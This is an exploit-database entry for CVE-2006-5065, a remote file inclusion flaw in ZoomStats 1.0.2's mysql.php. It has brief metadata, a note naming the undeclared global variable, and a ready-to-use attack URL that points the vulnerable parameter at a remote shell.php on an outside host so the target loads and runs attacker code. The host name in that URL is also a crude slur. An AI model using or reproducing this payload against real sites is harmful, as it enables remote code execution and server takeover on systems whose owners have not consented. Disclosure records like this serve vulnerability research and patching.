EXPLOITS

ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion

Author: Drago84
type: webapps
platform: php
port: 
date_added: 2006-09-23  
date_updated: 2016-09-09  
verified: 1  
codes: OSVDB-31431;CVE-2006-5065  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comZoomStats-v1.0.2.zip  

raw file: 2420.txt  

###### ToXiC #########################
#
#BuG FounD  by Drago84
#
#Application Affect:ZoomStats
#Source Code:
#http://prdownloads.sourceforge.net/zoomstats/ZoomStats-v1.0.2.zip?use_mirror=kent
#Problem:
#$GLOBALS['lib']['db']['path'] array not declare
#Solution : $GLOBALS['lib']['db']['path']
#Page Vulnerable : mysql.php
#Dir Page: /libs/dbmax/
# Exempe Of ExPloit is:
#http://www.site.com/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://marcusbestlamer.gay/shell.php?
#GrEatZ All Member of ToXiC, Str0ke
# ToXic Security
###### ToXiC ###Drago84###############

# milw0rm.com [2006-09-24]